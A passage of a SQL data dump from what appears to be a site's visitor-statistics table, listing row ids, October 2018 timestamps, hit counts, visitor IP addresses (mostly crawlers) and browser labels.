317063,1539489665,1,1,0,0,'54.36.148.97','other'),(317064,1539490140,1,1,0,0,'54.36.148.209','other'),(317065,1539490387,1,1,0,0,'54.36.148.250','other'),(317066,1539490429,1,1,0,0,'54.36.149.46','other'),(317067,1539490622,1,1,0,0,'54.36.148.113','other'),(317068,1539490735,1,1,0,0,'54.36.148.16','other'),(317069,1539490808,1,1,0,0,'54.36.148.129','other'),(317070,1539491164,1,1,0,0,'180.76.15.19','other'),(317071,1539491169,1,1,0,0,'54.36.148.228','other'),(317072,1539491196,1,1,0,0,'54.36.148.86','other'),(317073,1539491275,1,1,0,0,'157.55.39.115','other'),(317074,1539491364,1,1,0,0,'54.36.148.204','other'),(317075,1539491538,1,1,0,0,'54.36.148.98','other'),(317076,1539491560,1,1,0,0,'8.29.198.26','other'),(317077,1539491863,1,1,0,0,'54.36.149.12','other'),(317078,1539492145,1,1,0,0,'54.36.148.192','other'),(317079,1539492159,1,1,0,0,'54.36.149.40','other'),(317080,1539492181,1,1,0,0,'54.36.148.231','other'),(317081,1539492285,1,1,0,0,'54.36.149.5','other'),(317082,1539492412,1,1,0,0,'54.36.148.122','other'),(317083,1539492508,1,1,0,0,'54.36.149.65','other'),(317084,1539493386,1,1,0,0,'54.36.148.50','other'),(317085,1539493758,1,1,0,0,'54.36.148.53','other'),(317086,1539493877,1,1,0,0,'54.36.149.39','other'),(317087,1539493972,1,1,0,0,'54.36.148.77','other'),(317088,1539494282,1,1,0,0,'54.36.149.7','other'),(317089,1539494376,1,1,0,0,'54.36.149.28','other'),(317090,1539494485,1,1,0,0,'157.55.39.57','other'),(317091,1539495019,1,1,0,0,'54.36.148.185','other'),(317092,1539495026,1,1,0,0,'54.36.148.141','other'),(317093,1539495072,1,1,0,0,'54.36.148.88','other'),(317094,1539495164,1,1,0,0,'180.76.15.7','other'),(317095,1539495271,1,1,0,0,'54.36.148.70','other'),(317096,1539495424,1,1,0,0,'216.244.66.241','other'),(317097,1539495507,1,1,0,0,'54.36.149.81','other'),(317098,1539495619,1,1,0,0,'54.36.149.51','other'),(317099,1539495663,1,1,0,0,'54.36.148.179','other'),(317100,1539495818,1,1,0,0,'54.36.148.229','other'),(317101,1539495987,1,1,0,0,'54.36.148.29','other'),(317102,1539496219,1,1,0,0,'54.36.148.133','other'),(317103,1539496231,1,1,0,0,'54.36.148.91','other'),(317104,1539496418,1,1,0,0,'54.36.148.49','other'),(317105,1539496817,1,1,0,0,'54.36.149.57','other'),(317106,1539496868,1,1,0,0,'54.36.148.192','other'),(317107,1539497161,1,1,0,0,'95.163.255.92','other'),(317108,1539497195,1,1,0,0,'54.36.148.216','other'),(317109,1539497208,1,1,0,0,'54.36.149.70','other'),(317110,1539497500,1,1,0,0,'54.36.149.95','other'),(317111,1539497648,1,1,0,0,'54.36.148.68','other'),(317112,1539497671,1,1,0,0,'54.36.149.4','other'),(317113,1539497913,1,1,0,0,'46.229.168.129','other'),(317114,1539498042,2,2,0,0,'54.36.148.135','other'),(317115,1539498479,1,1,0,0,'8.29.198.25','other'),(317116,1539498491,1,1,0,0,'54.36.148.98','other'),(317117,1539498569,1,1,0,0,'54.36.148.225','other'),(317118,1539498712,1,1,0,0,'8.29.198.26','other'),(317119,1539498823,1,1,0,0,'54.36.148.215','other'),(317120,1539498996,1,1,0,0,'54.36.148.234','other'),(317121,1539499054,1,1,0,0,'54.36.149.3','other'),(317122,1539499135,2,2,0,0,'178.92.8.176','chrome'),(317123,1539499176,1,1,0,0,'54.36.148.157','other'),(317124,1539499494,1,1,0,0,'54.36.148.138','other'),(317125,1539499733,1,1,0,0,'54.36.148.206','other'),(317126,1539499751,1,1,0,0,'54.36.149.47','other'),(317127,1539499857,1,1,0,0,'54.36.149.102','other'),(317128,1539499858,1,1,0,0,'54.36.148.228','other'),(317129,1539500034,1,1,0,0,'54.36.148.155','other'),(317130,1539500325,2,2,0,0,'54.36.149.75','other'),(317131,1539500328,1,1,0,0,'54.36.148.45','other'),(317132,1539500464,1,1,0,0,'54.36.148.29','other'),(317133,1539500576,1,1,0,0,'54.36.148.216','other'),(317134,1539500635,1,1,0,0,'54.36.148.242','other'),(317135,1539500853,1,1,0,0,'37.54.23.36','chrome'),(317136,1539500887,1,1,0,0,'54.36.148.41','other'),(317137,1539500986,1,1,0,0,'54.36.148.30','other'),(317138,1539501257,1,1,0,0,'54.36.148.151','other'),(317139,1539501276,1,1,0,0,'54.36.148.243','other'),(317140,1539501531,1,1,0,0,'207.46.13.185','other'),(317141,1539501591,1,1,0,0,'54.36.149.77','other'),(317142,1539501604,1,1,0,0,'54.36.148.113','other'),(317143,1539501773,1,1,0,0,'54.36.148.24','other'),(317144,1539501926,1,1,0,0,'157.55.39.115','other'),(317145,1539502403,1,1,0,0,'8.29.198.26','other'),(317146,1539502526,1,1,0,0,'54.36.149.54','other'),(317147,1539502655,1,1,0,0,'54.36.148.90','other'),(317148,1539502697,1,1,0,0,'54.36.149.40','other'),(317149,1539502705,1,1,0,0,'95.163.255.93','other'),(317150,1539502724,1,1,0,0,'54.36.148.203','other'),(317151,1539503444,1,1,0,0,'54.36.148.70','other'),(317152,1539503447,1,1,0,0,'54.36.148.230','other'),(317153,1539503689,1,1,0,0,'54.36.148.16','other'),(317154,1539503907,1,1,0,0,'54.36.148.115','other'),(317155,1539504044,1,1,0,0,'54.36.149.88','other'),(317156,1539504174,1,1,0,0,'54.36.148.23','other'),(317157,1539504185,1,1,0,0,'54.36.148.178','other'),(317158,1539504364,1,1,0,0,'54.36.149.31','other'),(317159,1539504636,1,1,0,0,'54.36.149.30','other'),(317160,1539504650,1,1,0,0,'54.36.148.96','other'),(317161,1539505091,3,3,0,0,'216.244.66.241','other'),(317162,1539505269,1,1,0,0,'54.36.148.187','other'),(317163,1539505278,1,1,0,0,'54.36.148.64','other'),(317164,1539505469,1,1,0,0,'54.36.148.236','other'),(317165,1539505681,1,1,0,0,'54.36.148.172','other'),(317166,1539505705,1,1,0,0,'54.36.149.64','other'),(317167,1539505731,1,1,0,0,'54.36.148.165','other'),(317168,1539505767,1,1,0,0,'54.36.148.173','other'),(317169,1539505924,1,1,0,0,'54.36.149.88','other'),(317170,1539506118,1,1,0,0,'54.36.148.105','other'),(317171,1539506173,1,1,0,0,'54.36.149.50','other'),(317172,1539506270,1,1,0,0,'54.36.148.69','other'),(317173,1539506284,1,1,0,0,'54.36.148.109','other'),(317174,1539506515,1,1,0,0,'54.36.148.240','other'),(317175,1539506871,1,1,0,0,'54.36.148.148','other'),(317176,1539506920,1,1,0,0,'54.36.149.36','other'),(317177,1539507075,1,1,0,0,'54.36.149.55','other'),(317178,1539507750,1,1,0,0,'54.36.148.155','other'),(317179,1539507783,1,1,0,0,'54.36.148.54','other'),(317180,1539507852,1,1,0,0,'54.36.148.43','other'),(317181,1539507865,1,1,0,0,'54.36.149.64','other'),(317182,1539508218,1,1,0,0,'54.36.148.172','other'),(317183,1539508749,1,1,0,0,'66.249.64.201','chrome'),(317184,1539508954,1,1,0,0,'46.229.168.151','other'),(317185,1539509325,1,1,0,0,'8.29.198.27','other'),(317186,1539509355,1,1,0,0,'54.36.148.226','other'),(317187,1539509548,1,1,0,0,'8.29.198.25','other'),(317188,1539509617,1,1,0,0,'54.36.149.67','other'),(317189,1539509946,1,1,0,0,'46.211.49.117','chrome'),(317190,1539510515,1,1,0,0,'54.36.148.64','other'),(317191,1539510951,1,1,0,0,'54.36.148.143','other'),(317192,1539510967,1,1,0,0,'46.229.168.142','other'),(317193,1539510991,1,1,0,0,'54.36.149.68','other'),(317194,1539511033,1,1,0,0,'54.36.148.185','other'),(317195,1539511215,1,1,0,0,'54.36.148.198','other'),(317196,1539511418,1,1,0,0,'54.36.149.29','other'),(317197,1539511578,1,1,0,0,'54.36.148.125','other'),(317198,1539511652,1,1,0,0,'54.36.149.89','other'),(317199,1539511662,1,1,0,0,'54.36.149.65','other'),(317200,1539511789,1,1,0,0,'31.43.31.240','firefox'),(317201,1539511894,1,1,0,0,'207.46.13.185','other'),(317202,1539511957,1,1,0,0,'54.36.149.98','other'),(317203,1539512603,1,1,0,0,'119.29.82.97','other'),(317204,1539512675,1,1,0,0,'54.36.149.85','other'),(317205,1539513230,1,1,0,0,'8.29.198.27','other'),(317206,1539513561,1,1,0,0,'54.36.148.74','other'),(317207,1539513641,1,1,0,0,'54.36.149.45','other'),(317208,1539514053,1,1,0,0,'54.36.148.249','other'),(317209,1539514444,1,1,0,0,'54.36.149.38','other'),(317210,1539514563,1,1,0,0,'54.36.148.40','other'),(317211,1539514904,1,1,0,0,'54.36.149.47','other'),(317212,1539515317,1,1,0,0,'91.196.178.101','chrome'),(317213,1539515320,1,1,0,0,'54.36.148.194','other'),(317214,1539515642,1,1,0,0,'54.36.148.207','other'),(317215,1539516129,1,1,0,0,'54.36.149.43','other'),(317216,1539516472,1,1,0,0,'66.249.64.201','chrome'),(317217,1539516548,1,1,0,0,'54.36.148.58','other'),(317218,1539516580,1,1,0,0,'54.36.148.79','other'),(317219,1539517288,1,1,0,0,'54.36.148.18','other'),(317220,1539517569,1,1,0,0,'180.76.15.27','other'),(317221,1539517706,1,1,0,0,'54.36.148.21','other'),(317222,1539517931,1,1,0,0,'46.211.10.217','chrome'),(317223,1539518282,2,2,0,0,'178.154.244.29','other'),(317224,1539518720,1,1,0,0,'54.36.148.173','other'),(317225,1539519084,1,1,0,0,'54.36.149.51','other'),(317226,1539519245,2,2,0,0,'178.154.244.29','other'),(317227,1539519569,1,1,0,0,'180.76.15.5','other'),(317228,1539519635,1,1,0,0,'213.180.203.17','other'),(317229,1539520144,1,1,0,0,'51.255.65.46','other'),(317230,1539520168,2,2,0,0,'8.29.198.27','other'),(317231,1539520840,1,1,0,0,'54.36.149.25','other'),(317232,1539521021,1,1,0,0,'54.36.148.135','other'),(317233,1539521093,1,1,0,0,'54.36.148.160','other'),(317234,1539521281,1,1,0,0,'40.77.167.148','other'),(317235,1539521509,1,1,0,0,'54.36.148.74','other'),(317236,1539521713,1,1,0,0,'54.36.148.95','other'),(317237,1539522044,1,1,0,0,'91.196.178.84','chrome'),(317238,1539522168,1,1,0,0,'54.36.148.58','other'),(317239,1539522174,2,0,2,0,'66.249.64.199',''),(317240,1539522216,2,0,2,0,'66.249.64.195',''),(317241,1539522397,1,1,0,0,'54.36.148.197','other'),(317242,1539522500,1,1,0,0,'216.244.66.241','other'),(317243,1539522562,1,1,0,0,'54.36.148.68','other'),(317244,1539522576,1,1,0,0,'54.36.148.125','other'),(317245,1539522647,1,1,0,0,'178.154.244.11','other'),(317246,1539522908,1,1,0,0,'157.55.39.251','other'),(317247,1539523003,1,1,0,0,'54.36.149.57','other'),(317248,1539523064,1,1,0,0,'54.36.148.109','other'),(317249,1539523815,1,1,0,0,'54.36.149.60','other'),(317250,1539523818,1,1,0,0,'216.244.66.241','other'),(317251,1539523896,1,1,0,0,'54.36.149.65','other'),(317252,1539524069,1,1,0,0,'8.29.198.27','other'),(317253,1539524115,1,1,0,0,'54.36.148.58','other'),(317254,1539524293,1,1,0,0,'54.36.148.246','other'),(317255,1539525138,1,1,0,0,'37.53.122.16','chrome'),(317256,1539525634,1,1,0,0,'54.36.148.219','other'),(317257,1539525642,1,1,0,0,'54.36.148.150','other'),(317258,1539525720,1,1,0,0,'54.36.148.80','other'),(317259,1539526109,1,1,0,0,'51.255.65.46','other'),(317260,1539526122,1,1,0,0,'199.58.86.209','other'),(317261,1539526280,1,1,0,0,'54.36.148.204','other'),(317262,1539526313,1,0,1,0,'66.249.64.201',''),(317263,1539526343,1,1,0,0,'54.36.149.66','other'),(317264,1539526509,1,1,0,0,'54.36.149.107','other'),(317265,1539526638,1,1,0,0,'54.36.148.184','other'),(317266,1539526699,1,1,0,0,'54.36.149.78','other'),(317267,1539527081,1,1,0,0,'54.36.149.101','other'),(317268,1539527301,1,1,0,0,'54.36.148.159','other'),(317269,1539527332,1,1,0,0,'148.251.244.137','other'),(317270,1539527404,1,1,0,0,'157.55.39.251','other'),(317271,1539527710,1,1,0,0,'54.36.148.149','other'),(317272,1539527878,2,2,0,0,'178.154.244.11','other'),(317273,1539527903,1,1,0,0,'5.45.207.79','other'),(317274,1539527938,1,1,0,0,'54.36.149.7','other'),(317275,1539528039,1,1,0,0,'54.36.148.64','other'),(317276,1539528219,1,1,0,0,'54.36.149.46','other'),(317277,1539528460,1,1,0,0,'69.12.66.253','chrome'),(317278,1539528531,1,1,0,0,'54.36.148.51','other'),(317279,1539528659,1,1,0,0,'54.36.149.64','other'),(317280,1539528776,1,1,0,0,'54.165.59.7','other'),(317281,1539528857,1,1,0,0,'54.36.148.214','other'),(317282,1539529841,1,1,0,0,'54.36.149.60','other'),(317283,1539529844,1,1,0,0,'54.36.148.64','other'),(317284,1539530168,1,1,0,0,'54.36.148.167','other'),(317285,1539530904,1,1,0,0,'216.244.66.241','other'),(317286,1539531029,1,1,0,0,'8.29.198.26','other'),(317287,1539531060,1,1,0,0,'180.76.15.149','other'),(317288,1539531230,1,1,0,0,'8.29.198.25','other'),(317289,1539531358,1,1,0,0,'54.36.148.195','other'),(317290,1539531468,1,1,0,0,'54.36.148.19','other'),(317291,1539531478,1,1,0,0,'193.106.30.98','firefox'),(317292,1539531783,1,1,0,0,'54.36.148.223','other'),(317293,1539532010,1,1,0,0,'216.244.66.241','other'),(317294,1539532406,1,1,0,0,'54.36.148.52','other'),(317295,1539533018,1,1,0,0,'54.36.148.240','other'),(317296,1539533711,1,1,0,0,'178.154.244.29','other'),(317297,1539534002,1,1,0,0,'54.36.148.12','other'),(317298,1539534540,1,1,0,0,'54.36.148.54','other'),(317299,1539534779,1,1,0,0,'54.36.148.167','other'),(317300,1539534796,1,1,0,0,'54.36.148.89','other'),(317301,1539534897,1,1,0,0,'8.29.198.27','other'),(317302,1539535135,1,1,0,0,'54.36.148.216','other'),(317303,1539535263,1,1,0,0,'54.36.148.48','other'),(317304,1539535512,2,2,0,0,'54.36.148.117','other'),(317305,1539536017,1,1,0,0,'54.36.149.84','other'),(317306,1539536245,1,1,0,0,'54.36.148.191','other'),(317307,1539536478,1,1,0,0,'91.196.121.10','chrome'),(317308,1539536613,1,1,0,0,'54.36.148.254','other'),(317309,1539536924,1,1,0,0,'54.36.148.48','other'),(317310,1539537282,1,1,0,0,'216.244.66.241','other'),(317311,1539537411,1,1,0,0,'66.249.64.195','chrome'),(317312,1539537453,2,2,0,0,'91.209.11.236','other'),(317313,1539537775,1,1,0,0,'54.36.148.202','other'),(317314,1539537825,1,1,0,0,'54.36.148.147','other'),(317315,1539537871,1,1,0,0,'54.36.148.225','other'),(317316,1539537966,1,1,0,0,'54.36.149.81','other'),(317317,1539538632,1,1,0,0,'37.54.23.36','chrome'),(317318,1539538816,1,1,0,0,'54.36.148.249','other'),(317319,1539539041,2,2,0,0,'91.209.11.236','other'),(317320,1539539042,1,1,0,0,'54.36.149.54','other'),(317321,1539539048,1,1,0,0,'66.249.64.195','chrome'),(317322,1539539255,1,1,0,0,'54.36.148.204','other'),(317323,1539539428,1,1,0,0,'54.36.148.232','other'),(317324,1539539498,1,1,0,0,'54.36.148.115','other'),(317325,1539539753,1,1,0,0,'178.62.23.75','other'),(317326,1539540060,1,1,0,0,'213.202.254.136','opera'),(317327,1539540344,1,1,0,0,'54.36.148.16','other'),(317328,1539540608,1,1,0,0,'54.36.148.112','other'),(317329,1539541182,1,1,0,0,'66.249.64.61','chrome'),(317330,1539541487,1,1,0,0,'54.36.148.161','other'),(317331,1539541499,1,1,0,0,'54.36.149.23','other'),(317332,1539541579,1,1,0,0,'54.36.148.148','other'),(317333,1539541585,1,1,0,0,'46.229.168.138','other'),(317334,1539541678,1,1,0,0,'54.36.148.205','other'),(317335,1539541880,1,1,0,0,'8.29.198.27','other'),(317336,1539542029,1,1,0,0,'54.36.148.198','other'),(317337,1539542074,1,1,0,0,'8.29.198.26','other'),(317338,1539542418,1,1,0,0,'54.36.149.87','other'),(317339,1539542582,1,1,0,0,'54.36.148.54','other'),(317340,1539542804,1,1,0,0,'54.36.148.96','other'),(317341,1539542888,1,1,0,0,'54.36.148.108','other'),(317342,1539543457,1,1,0,0,'54.36.148.41','other'),(317343,1539543604,2,2,0,0,'37.73.78.77','chrome'),(317344,1539543670,1,1,0,0,'54.36.149.71','other'),(317345,1539543963,1,1,0,0,'54.36.148.251','other'),(317346,1539545084,1,1,0,0,'216.244.66.241','other'),(317347,1539545373,1,1,0,0,'46.229.168.143','other'),(317348,1539545414,1,1,0,0,'54.36.148.55','other'),(317349,1539545431,1,1,0,0,'54.36.148.136','other'),(317350,1539545709,1,1,0,0,'54.36.148.147','other'),(317351,1539545726,1,1,0,0,'54.36.148.154','other'),(317352,1539545730,1,1,0,0,'8.29.198.27','other'),(317353,1539545765,1,1,0,0,'54.36.148.58','other'),(317354,1539545919,1,1,0,0,'54.36.149.70','other'),(317355,1539545977,1,1,0,0,'54.36.149.27','other'),(317356,1539546189,1,1,0,0,'54.36.148.225','other'),(317357,1539546332,1,1,0,0,'54.36.148.208','other'),(317358,1539546532,1,1,0,0,'54.36.148.237','other'),(317359,1539546665,1,1,0,0,'54.36.149.0','other'),(317360,1539547002,1,1,0,0,'54.36.148.171','other'),(317361,1539547357,1,1,0,0,'54.36.148.128','other'),(317362,1539547434,1,1,0,0,'54.36.148.73','other'),(317363,1539547445,1,1,0,0,'54.36.148.96','other'),(317364,1539547831,1,1,0,0,'66.249.64.201','chrome'),(317365,1539548046,1,1,0,0,'54.36.149.24','other'),(317366,1539548094,1,1,0,0,'54.36.148.102','other'),(317367,1539548657,1,1,0,0,'216.244.66.241','other'),(317368,1539548853,1,1,0,0,'54.36.148.182','other'),(317369,1539548914,1,1,0,0,'54.36.148.39','other'),(317370,1539549418,1,1,0,0,'54.36.149.64','other'),(317371,1539549436,1,1,0,0,'54.36.148.213','other'),(317372,1539549908,1,1,0,0,'54.36.149.83','other'),(317373,1539550270,1,1,0,0,'54.36.148.75','other'),(317374,1539550558,1,1,0,0,'54.36.149.78','other'),(317375,1539550638,1,1,0,0,'54.36.149.80','other'),(317376,1539550992,1,1,0,0,'54.36.148.46','other'),(317377,1539551353,1,1,0,0,'54.36.148.109','other'),(317378,1539551655,1,1,0,0,'95.163.255.96','other'),(317379,1539551661,1,1,0,0,'54.36.149.46','other'),(317380,1539552032,1,1,0,0,'54.36.148.134','other'),(317381,1539552066,1,1,0,0,'54.36.148.74','other'),(317382,1539552112,1,1,0,0,'54.36.148.70','other'),(317383,1539552264,3,3,0,0,'40.77.167.148','other'),(317384,1539552268,4,4,0,0,'157.55.39.115','other'),(317385,1539552279,4,4,0,0,'207.46.13.185','other'),(317386,1539552284,6,6,0,0,'157.55.39.251','other'),(317387,1539552509,1,1,0,0,'54.36.149.67','other'),(317388,1539552606,2,2,0,0,'216.244.66.241','other'),(317389,1539552729,1,1,0,0,'54.36.148.133','other'),(317390,1539552732,1,1,0,0,'8.29.198.26','other'),(317391,1539552907,1,1,0,0,'8.29.198.27','other'),(317392,1539552947,1,1,0,0,'35.202.99.105','other'),(317393,1539552984,1,1,0,0,'54.36.148.202','other'),(317394,1539553265,1,1,0,0,'54.36.149.95','other'),(317395,1539553420,1,1,0,0,'54.36.148.217','other'),(317396,1539553471,1,1,0,0,'66.249.64.201','chrome'),(317397,1539553597,1,1,0,0,'54.36.148.57','other'),(317398,1539553633,1,1,0,0,'54.36.148.24','other'),(317399,1539553856,1,1,0,0,'54.36.148.97','other'),(317400,1539554337,1,1,0,0,'54.36.148.175','other'),(317401,1539554588,1,1,0,0,'54.36.148.183','other'),(317402,1539554684,1,1,0,0,'216.244.66.241','other'),(317403,1539554939,1,1,0,0,'54.36.148.227','other'),(317404,1539554969,1,1,0,0,'54.36.149.73','other'),(317405,1539555046,1,1,0,0,'54.36.148.221','other'),(317406,1539555144,1,0,1,0,'66.249.64.59',''),(317407,1539555181,1,1,0,0,'46.229.168.129','other'),(317408,1539555614,1,1,0,0,'54.36.148.238','other'),(317409,1539555658,1,1,0,0,'54.36.148.198','other'),(317410,1539555790,1,1,0,0,'54.36.148.132','other'),(317411,1539555909,1,1,0,0,'54.36.148.162','other'),(317412,1539556044,1,1,0,0,'54.36.149.72','other'),(317413,1539556049,1,1,0,0,'54.36.148.12','other'),(317414,1539556269,1,1,0,0,'54.36.148.89','other'),(317415,1539556562,1,1,0,0,'8.29.198.25','other'),(317416,1539556696,1,1,0,0,'54.36.148.14','other'),(317417,1539556945,1,1,0,0,'54.36.148.233','other'),(317418,1539557146,1,1,0,0,'54.36.148.237','other'),(317419,1539557432,1,1,0,0,'54.36.149.58','other'),(317420,1539557556,1,1,0,0,'54.36.148.86','other'),(317421,1539557737,1,1,0,0,'178.17.170.194','other'),(317422,1539557795,1,1,0,0,'54.36.148.31','other'),(317423,1539558273,1,1,0,0,'54.36.148.221','other'),(317424,1539558425,1,1,0,0,'162.210.196.100','other'),(317425,1539558734,1,1,0,0,'216.244.66.241','other'),(317426,1539559035,1,1,0,0,'54.36.148.154','other'),(317427,1539559082,1,1,0,0,'54.36.148.162','other'),(317428,1539559118,1,1,0,0,'54.36.149.50','other'),(317429,1539559137,1,1,0,0,'54.36.148.21','other'),(317430,1539559395,1,1,0,0,'54.36.149.75','other'),(317431,1539559419,1,1,0,0,'85.10.207.195','other'),(317432,1539559491,1,1,0,0,'54.36.148.131','other'),(317433,1539559663,1,1,0,0,'54.36.149.64','other'),(317434,1539559671,1,1,0,0,'54.36.148.29','other'),(317435,1539559836,1,1,0,0,'54.36.148.43','other'),(317436,1539559945,1,1,0,0,'54.36.149.54','other'),(317437,1539560262,1,1,0,0,'170.239.212.62','chrome'),(317438,1539560284,2,2,0,0,'103.57.80.56','chrome'),(317439,1539560358,1,1,0,0,'54.36.148.117','other'),(317440,1539560496,1,1,0,0,'207.46.13.185','other'),(317441,1539560761,1,1,0,0,'54.36.148.193','other'),(317442,1539561127,1,1,0,0,'54.36.148.157','other'),(317443,1539561199,1,1,0,0,'54.36.148.254','other'),(317444,1539561202,1,1,0,0,'54.36.149.55','other'),(317445,1539561258,1,1,0,0,'54.36.149.58','other'),(317446,1539561597,1,1,0,0,'54.36.148.177','other'),(317447,1539561938,1,1,0,0,'54.36.148.222','other'),(317448,1539562025,1,1,0,0,'178.154.244.11','other'),(317449,1539562263,1,1,0,0,'54.36.148.26','other'),(317450,1539562353,1,1,0,0,'54.36.148.142','other'),(317451,1539562356,1,1,0,0,'54.36.148.209','other'),(317452,1539562385,1,1,0,0,'54.36.148.113','other'),(317453,1539562458,1,1,0,0,'216.244.66.241','other'),(317454,1539562670,1,1,0,0,'54.36.148.128','other'),(317455,1539562698,1,1,0,0,'54.36.148.175','other'),(317456,1539562940,2,2,0,0,'178.154.244.11','other'),(317457,1539563028,1,1,0,0,'5.45.207.79','other'),(317458,1539563123,1,1,0,0,'54.36.149.7','other'),(317459,1539563289,1,1,0,0,'54.36.148.232','other'),(317460,1539563442,1,1,0,0,'54.36.149.96','other'),(317461,1539563511,1,1,0,0,'54.36.148.95','other'),(317462,1539563515,1,1,0,0,'54.36.149.50','other'),(317463,1539563531,1,1,0,0,'178.154.244.29','other'),(317464,1539563554,1,1,0,0,'141.8.142.103','other'),(317465,1539563568,1,1,0,0,'8.29.198.25','other'),(317466,1539563745,1,1,0,0,'8.29.198.26','other'),(317467,1539564145,1,1,0,0,'54.36.149.44','other'),(317468,1539564179,1,1,0,0,'216.244.66.241','other'),(317469,1539564428,1,1,0,0,'54.36.148.99','other'),(317470,1539564816,1,1,0,0,'54.36.148.131','other'),(317471,1539564890,1,1,0,0,'95.220.98.141','msie'),(317472,1539564892,1,1,0,0,'95.84.221.152','msie'),(317473,1539564927,1,1,0,0,'5.45.207.79','other'),(317474,1539564951,1,1,0,0,'54.36.148.115','other'),(317475,1539565379,1,1,0,0,'178.154.244.29','other'),(317476,1539565488,1,1,0,0,'178.154.244.11','other'),(317477,1539565504,1,1,0,0,'54.36.148.192','other'),(317478,1539565578,1,1,0,0,'54.36.148.180','other'),(317479,1539565767,1,1,0,0,'54.36.149.87','other'),(317480,1539565888,1,1,0,0,'54.36.148.87','other'),(317481,1539565937,4,4,0,0,'148.251.120.201','other'),(317482,1539566145,1,1,0,0,'54.36.148.33','other'),(317483,1539566258,1,1,0,0,'54.36.148.253','other'),(317484,1539566335,2,2,0,0,'5.45.207.79','other'),(317485,1539566423,1,1,0,0,'207.46.13.185','other'),(317486,1539566497,1,1,0,0,'54.36.149.65','other'),(317487,1539566514,2,2,0,0,'54.165.59.7','other'),(317488,1539566828,1,1,0,0,'54.36.149.103','other'),(317489,1539567026,1,1,0,0,'157.55.39.251','other'),(317490,1539567127,1,1,0,0,'54.36.148.208','other'),(317491,1539567290,1,1,0,0,'54.36.149.20','other'),(317492,1539567394,1,1,0,0,'8.29.198.26','other'),(317493,1539567913,1,1,0,0,'54.36.149.37','other'),(317494,1539567917,1,1,0,0,'54.36.148.220','other'),(317495,1539567925,1,1,0,0,'46.229.168.148','other'),(317496,1539568284,1,1,0,0,'54.36.148.150','other'),(317497,1539568389,1,1,0,0,'54.36.148.147','other'),(317498,1539569132,1,1,0,0,'54.36.148.98','other'),(317499,1539569675,1,1,0,0,'54.36.148.197','other'),(317500,1539569718,2,2,0,0,'54.165.59.7','other'),(317501,1539569800,2,2,0,0,'178.154.244.29','other'),(317502,1539570001,1,1,0,0,'54.36.148.75','other'),(317503,1539570013,1,1,0,0,'54.36.148.193','other'),(317504,1539570045,1,1,0,0,'178.154.244.11','other'),(317505,1539570068,1,1,0,0,'54.36.148.241','other'),(317506,1539570078,1,1,0,0,'216.244.66.241','other'),(317507,1539570149,1,1,0,0,'54.36.149.62','other'),(317508,1539570447,1,1,0,0,'54.36.149.4','other'),(317509,1539570492,1,1,0,0,'54.36.148.58','other'),(317510,1539571073,1,1,0,0,'54.36.148.160','other'),(317511,1539571605,1,1,0,0,'54.36.148.21','other'),(317512,1539571632,1,1,0,0,'54.36.149.65','other'),(317513,1539571824,1,1,0,0,'54.36.148.172','other'),(317514,1539571829,1,1,0,0,'54.36.148.213','other'),(317515,1539572181,1,1,0,0,'54.36.149.13','other'),(317516,1539572546,1,1,0,0,'54.36.149.36','other'),(317517,1539572662,2,2,0,0,'216.244.66.241','other'),(317518,1539572700,1,1,0,0,'54.36.148.228','other'),(317519,1539572842,1,1,0,0,'54.36.148.233','other'),(317520,1539573159,1,1,0,0,'54.36.148.37','other'),(317521,1539573359,1,1,0,0,'54.36.148.92','other'),(317522,1539573394,1,1,0,0,'54.36.148.242','other'),(317523,1539573428,1,1,0,0,'157.55.39.115','other'),(317524,1539573774,1,1,0,0,'54.36.148.170','other'),(317525,1539574116,1,1,0,0,'54.36.148.94','other'),(317526,1539574403,1,1,0,0,'8.29.198.25','other'),(317527,1539574446,1,1,0,0,'54.36.148.38','other'),(317528,1539574483,1,1,0,0,'95.163.255.94','other'),(317529,1539574578,1,1,0,0,'8.29.198.26','other'),(317530,1539574936,1,1,0,0,'46.229.168.132','other'),(317531,1539575373,1,1,0,0,'54.36.148.111','other'),(317532,1539575774,1,1,0,0,'54.36.148.212','other'),(317533,1539576073,1,1,0,0,'54.36.148.200','other'),(317534,1539576448,1,1,0,0,'54.36.148.240','other'),(317535,1539576770,1,1,0,0,'54.36.148.125','other'),(317536,1539577342,1,1,0,0,'54.36.148.137','other'),(317537,1539577358,1,1,0,0,'54.36.148.194','other'),(317538,1539577446,1,1,0,0,'54.36.148.118','other'),(317539,1539577721,1,1,0,0,'37.146.247.200','msie'),(317540,1539577831,1,1,0,0,'54.36.148.23','other'),(317541,1539577871,1,1,0,0,'54.36.149.75','other'),(317542,1539577936,1,1,0,0,'54.36.149.69','other'),(317543,1539578043,1,1,0,0,'54.36.148.150','other'),(317544,1539578225,1,1,0,0,'54.36.148.87','other'),(317545,1539578236,1,1,0,0,'8.29.198.27','other'),(317546,1539578259,1,1,0,0,'54.36.149.50','other'),(317547,1539578346,1,1,0,0,'54.36.148.66','other'),(317548,1539578368,1,1,0,0,'54.36.148.109','other'),(317549,1539578429,1,1,0,0,'216.244.66.241','other'),(317550,1539578833,1,1,0,0,'54.36.148.154','other'),(317551,1539578885,1,1,0,0,'54.36.148.117','other'),(317552,1539579322,1,1,0,0,'54.36.148.187','other'),(317553,1539579374,1,1,0,0,'54.36.148.16','other'),(317554,1539579516,1,1,0,0,'54.36.148.85','other'),(317555,1539579526,1,1,0,0,'54.36.148.175','other'),(317556,1539579685,1,1,0,0,'23.229.70.143','chrome'),(317557,1539579714,1,1,0,0,'54.36.149.95','other'),(317558,1539579729,1,1,0,0,'209.58.178.49','other'),(317559,1539579800,1,1,0,0,'54.36.148.232','other'),(317560,1539579960,1,1,0,0,'54.36.149.67','other'),(317561,1539580300,1,1,0,0,'54.36.148.158','other'),(317562,1539580586,1,1,0,0,'54.36.148.15','other'),(317563,1539580683,1,1,0,0,'54.36.149.2','other'),(317564,1539581074,1,1,0,0,'54.36.148.58','other'),(317565,1539581185,1,1,0,0,'54.36.149.67','other'),(317566,1539581766,1,1,0,0,'54.36.148.228','other'),(317567,1539581779,1,1,0,0,'54.36.148.216','other'),(317568,1539581801,1,1,0,0,'54.36.148.245','other'),(317569,1539582043,1,1,0,0,'54.36.148.113','other'),(317570,1539582474,1,1,0,0,'180.76.15.6','other'),(317571,1539582824,1,1,0,0,'54.36.148.45','other'),(317572,1539582857,1,1,0,0,'178.154.244.11','other'),(317573,1539582880,1,1,0,0,'178.154.244.29','other'),(317574,1539582980,1,1,0,0,'54.36.148.38','other'),(317575,1539583127,1,1,0,0,'54.36.148.150','other'),(317576,1539583373,1,1,0,0,'216.244.66.241','other'),(317577,1539584047,1,1,0,0,'54.36.148.210','other'),(317578,1539584273,1,1,0,0,'54.